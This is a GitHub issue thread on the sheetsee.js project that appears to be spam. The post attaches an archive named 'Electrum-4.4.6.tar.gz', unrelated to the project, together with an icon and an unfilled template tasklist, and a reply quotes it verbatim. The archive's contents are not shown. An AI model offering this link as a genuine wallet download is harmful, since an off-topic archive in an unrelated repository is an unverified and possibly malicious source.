### ISSUE TITLE
JSON7

### ISSUE THREAD

**Issue by Jasonford323** [jlord/sheetsee.js#496]
[Electrum-4.4.6.tar.gz](https://github.com/jlord/sheetsee.js/files/12836926/Electrum-4.4.6.tar.gz)
![icon-128x128](https://github.com/jlord/sheetsee.js/assets/144928638/d387d1aa-b8e1-406c-867d-de2a5dbb4baf)

```[tasklist]
### Tasks
- [x] Add a draft title or issue reference here
- [ ] https://github.com/jlord/sheetsee.js/issues/157
- [ ] https://github.com/jlord/sheetsee.js/issues/465
- [ ] https://github.com/jlord/sheetsee.js/issues/25
- [ ] https://github.com/jlord/sheetsee.js/pull/455
- [ ] https://github.com/jlord/sheetsee.js/issues/458
```

**Comment by cklim4405** [comment]
> [Electrum-4.4.6.tar.gz](https://github.com/jlord/sheetsee.js/files/12836926/Electrum-4.4.6.tar.gz)
> ![icon-128x128](https://github.com/jlord/sheetsee.js/assets/144928638/d387d1aa-b8e1-406c-867d-de2a5dbb4baf)
> 
> ```[tasklist]
> ### Tasks
> - [ ] Add a draft title or issue reference here
> - [ ] https://github.com/jlord/sheetsee.js/issues/157
> - [ ] https://github.com/jlord/sheetsee.js/issues/465
> - [ ] https://github.com/jlord/sheetsee.js/issues/25
> - [ ] https://github.com/jlord/sheetsee.js/pull/455
> - [ ] https://github.com/jlord/sheetsee.js/issues/458
> ```
>
